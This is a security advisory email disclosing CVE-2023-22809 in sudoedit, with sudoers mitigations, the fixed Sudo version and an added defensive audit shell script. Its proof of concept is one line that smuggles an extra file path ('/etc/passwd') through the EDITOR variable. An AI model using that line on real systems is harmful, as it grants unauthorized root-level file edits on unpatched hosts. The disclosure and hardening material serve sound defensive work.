Date: Thu, 19 Jan 2023 01:33:43 +0100
From: Matthieu Barjole <>
Subject: CVE-2023-22809: Sudoedit can edit arbitrary files

Hello everyone,

While auditing Sudo, Synacktiv identified a privilege escalation in sudoedit
that is reachable by any user the sudoers policy authorizes to run it. This
was assigned CVE-2023-22809 and affects Sudo versions 1.8.0 through 1.9.12p1.

## Analysis

The technical analysis can be found in the following security advisory:

## Proof of Concept

Assuming the following sudoers policy:

# cat /etc/sudoers
user ALL=(ALL:ALL) sudoedit /etc/motd

With that policy in place, arbitrary files such as `/etc/passwd` can also be edited, like so:

EDITOR='vim -- /etc/passwd' sudoedit /etc/motd

## Mitigation

It is possible to prevent a user-specified editor from being used by sudoedit
by adding the following line to the sudoers file.

Defaults!sudoedit   env_delete+="SUDO_EDITOR VISUAL EDITOR"

To restrict the editor when editing specific files, a Cmnd_Alias can be used,
for example:

Cmnd_Alias          EDIT_MOTD = sudoedit /etc/motd
user                ALL = EDIT_MOTD
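As an added example (not part of Synacktiv's advisory or the Sudo project's code), the two shell functions below let a defender check, first, whether a sudoers policy that grants sudoedit also carries the env_delete line recommended above, and second, whether an editor value of the shape shown in the proof of concept would be accepted. The policies and the editor strings are constructed sample input; the "bare `--` argument" check is my reading of what the upstream fix rejects, stated here as an assumption rather than taken from the advisory.

```shell
#!/bin/sh
# Added example, not from the advisory. Assumptions: sudoers text is passed
# as a string; the rules and paths below are constructed for the demo.

# Constructed sample policy: grants sudoedit but leaves EDITOR under user control.
VULN_POLICY='user ALL=(ALL:ALL) sudoedit /etc/motd'

# Constructed sample policy with the env_delete mitigation from the advisory added.
HARDENED_POLICY='Defaults!sudoedit   env_delete+="SUDO_EDITOR VISUAL EDITOR"
user ALL=(ALL:ALL) sudoedit /etc/motd'

# Return 0 if the policy text contains a "Defaults!sudoedit env_delete" line
# that strips at least one of the editor-selecting variables.
sudoers_has_sudoedit_env_delete() {
    printf '%s\n' "$1" | grep -Eq \
        '^[[:space:]]*Defaults![[:space:]]*sudoedit[[:space:]]+env_delete[+]?=.*(SUDO_EDITOR|VISUAL|EDITOR)'
}

# Return 0 if the policy text grants sudoedit anywhere (rule or Defaults line).
sudoers_grants_sudoedit() {
    printf '%s\n' "$1" | grep -Eq '(^|[[:space:]!])sudoedit([[:space:]]|$)'
}

# Return 0 if the editor string, split on whitespace the way an editor
# environment variable is, contains a bare "--" word. That is the shape used
# in the proof of concept above; treating it as a rejection criterion is an
# assumption about the upstream fix, not a quote of it.
editor_has_double_dash() {
    set -f            # no globbing while we word-split the string
    set -- $1
    set +f
    for word in "$@"; do
        [ "$word" = "--" ] && return 0
    done
    return 1
}

# Audit verdict for one policy text.
# Exit status: 0 = no sudoedit rules, or rules plus mitigation present;
#              2 = sudoedit granted without the env_delete mitigation.
audit_sudoedit_policy() {
    if ! sudoers_grants_sudoedit "$1"; then
        echo "no sudoedit rules: nothing to do"
        return 0
    fi
    if sudoers_has_sudoedit_env_delete "$1"; then
        echo "sudoedit granted, env_delete mitigation present"
        return 0
    fi
    echo "sudoedit granted, no env_delete mitigation: user-controlled editor"
    return 2
}

# Stand-alone run over the two constructed policies and two editor values.
audit_sudoedit_policy "$VULN_POLICY"
audit_sudoedit_policy "$HARDENED_POLICY"
for ed in 'vim' 'vim -- /etc/passwd'; do
    if editor_has_double_dash "$ed"; then
        echo "editor value '$ed': contains a bare -- argument, would be rejected"
    else
        echo "editor value '$ed': plain editor, accepted"
    fi
done
```

On a real host the policy text would come from `visudo -c -f` output or a read of `/etc/sudoers` and `/etc/sudoers.d/*` as root; the env_delete line only protects sudoedit, so a grep that also covers `env_keep` additions elsewhere in the policy is a sensible follow-up.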

## Fix

The issue was fixed in Sudo 1.9.12p2.

## References

